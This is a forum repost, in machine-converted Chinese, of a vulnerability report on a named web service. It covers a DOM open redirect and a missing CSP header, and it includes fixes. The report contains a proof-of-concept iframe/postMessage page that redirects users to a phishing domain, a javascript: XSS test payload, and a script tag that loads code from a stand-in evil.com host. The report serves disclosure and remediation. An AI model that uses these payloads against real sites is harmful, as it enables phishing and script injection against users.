安全漏洞验证陈诉

张裕  论坛元老 | 2025-3-19 00:29:53 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 1385|帖子 1385|积分 4155

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?立即注册

x
安全漏洞验证陈诉

目的体系:https://studio.d-id.com
测试时间:2025-02-22
陈诉版本:2.0
发现者:Neatsuki
漏洞概览

漏洞类型风险品级CVSS 3.1CWE-ID状态DOM型开放重定向高危7.1CWE-601未修复CSP战略缺失中危5.5CWE-16未修复
漏洞详情

1. DOM型开放重定向

漏洞描述

前端代码未对 redirect 参数的目的域名进行校验,导致攻击者可通过构造恶意链接或结合 postMessage 跨域消息触发恣意域名跳转。
复现步骤


  • 构造恶意页面
    1. <iframe id="malicious-iframe" src="https://studio.d-id.com"></iframe>
    2. <script>
    3.   setTimeout(() => {
    4.     document.getElementById("malicious-iframe").contentWindow.postMessage({
    5.       type: "redirect",
    6.       url: "https://studio.d-id.com/?redirect=https://phishing.com
    7. "
    8.     }, "*");
    9.   }, 3000);
    10. </script>
    复制代码
  • 用户访问恶意页面
    等候3秒后,主页面主动跳转至 https://phishing.com。
影响证明



  • 网络哀求跟踪
    1. GET /?redirect=https://phishing.com HTTP/2
    2. Host: studio.d-id.com
    复制代码
  1. - **浏览器控制台日志**:  
  2.   ```javascript
  3.   > window.location.href
  4.   < "https://phishing.com"
复制代码
2. CSP战略缺失

漏洞描述

目的体系未设置 Content-Security-Policy 响应头,允许攻击者注入外部脚本或通过内联脚本实行恶意代码。
复现步骤


  • 发送HTTP哀求验证CSP头
    1. curl -I https://studio.d-id.com | grep "Content-Security-Policy"
    2. # 无返回结果
    复制代码
  • 构造XSS测试Payload
    1. history.replaceState(null, null, '?redirect=javascript:alert(document.domain)');
    2. location.reload();
    复制代码
    结果

    • 浏览器拦截 javascript: 协议实行,但若存在其他注入点(如动态脚本加载),风险仍存在。

影响证明



  • 潜在攻击场景
    若存在其他未过滤的输入点(如动态加载脚本),攻击者可注入:
    1. <script src="https://evil.com/exploit.js"></script>
    复制代码
修复发起

1. DOM型开放重定向

前端修复

  1. const ALLOWED_DOMAINS = ["d-id.com", "trusted.com"];
  2. const ALLOWED_PROTOCOLS = ["http:", "https:"];
  4. function safeRedirect(url) {
  5.   try {
  6.     const target = new URL(url, window.location.origin);
  7.     if (
  8.       !ALLOWED_PROTOCOLS.includes(target.protocol) ||
  9.       !ALLOWED_DOMAINS.some(domain => target.hostname.endsWith(domain))
  10.     ) {
  11.       throw new Error("非法重定向目标");
  12.     }
  13.     window.location.href = target.href;
  14.   } catch (error) {
  15.     console.error("安全拦截:", error.message);
  16.     history.replaceState(null, "", window.location.pathname);
  17.   }
  18. }
  20. // 调用示例
  21. const redirectParam = new URLSearchParams(location.search).get("redirect");
  22. if (redirectParam) safeRedirect(redirectParam);
复制代码
服务端修复

  1. # 拦截非法域名和协议
  2. if ($arg_redirect !~* "^https?:\/\/([a-z0-9-]+\.)?d-id\.com") {
  3.   return 403;
  4. }
复制代码
2. CSP战略缺失

设置强制CSP头

  1. Content-Security-Policy:
  2.   default-src 'none';
  3.   script-src 'self' 'nonce-{RANDOM}';
  4.   style-src 'self' 'unsafe-inline';
  5.   img-src 'self' data:;
  6.   connect-src 'self';
  7.   form-action 'self';
  8.   navigate-to 'self' https://*.d-id.com;
  9.   report-uri /csp-report;
复制代码
漏洞验证阐明


  • 开放重定向复测
    访问修复后的链接应保持当前页面:
    1. https://studio.d-id.com/?redirect=https://phishing.com
    复制代码
    控制台需显示拦截日记:
    1. 安全拦截: 非法重定向目标
    复制代码
  • CSP见效验证
    1. curl -I https://studio.d-id.com | grep "Content-Security-Policy"
    2. # 应返回配置的CSP头
    复制代码
附录

测试工具与参考

工具/标准用途Burp Suite Pro流量截获与漏洞验证OWASP ZAP主动化扫描OWASP Top 10漏洞分类参考
陈诉编制:Neatsuki
审核:null
发布日期:2025-02-23
此陈诉仅包罗已验证成功的漏洞,全部修复发起均基于实际复现结果。发起在 48小时内 完成高危漏洞修复,并通过第三方渗出测试确认修复效果。

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

张裕

论坛元老
这个人很懒什么都没写!

楼主热帖

标签云

AI 运维 CIO 存储 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表